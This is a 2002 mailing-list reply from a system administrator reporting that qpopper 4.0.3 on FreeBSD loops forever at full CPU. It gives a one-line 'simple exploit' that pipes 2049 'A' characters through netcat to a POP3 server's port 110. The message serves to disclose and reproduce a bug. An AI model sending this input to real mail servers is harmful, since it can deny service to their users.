On Tue, 19 Mar 2002 23:19:01 -0600, Randall Gellens wrote:

>The cause isn't as simple as that, sorry (which I realized as soon as 
>I sent the message).  It doesn't loop for me on some systems (such as 
>OpenBSD 2.9) with inputs that aren't an even multiple of 2048.  It 
>also doesn't loop for me at all (with any size input) on some systems 
>(such as Darwin/MacOS X).

on a FreeBSD 4.4-stable with qpopper 4.0.3 it loops forever (near 100%
CPU) but does not eat memory, according to "top"

I used this simple exploit:

perl -e '{print "A"x"2049"}' | nc my.pop3.host 110

(nc is netcat)


Alessandro de Manzano

Senior System & Network Administrator
Playstos - TIMA SpA
Corso Sempione 63
20149 Milano

tel.: +39-02-3314153
fax: +39-02-315678


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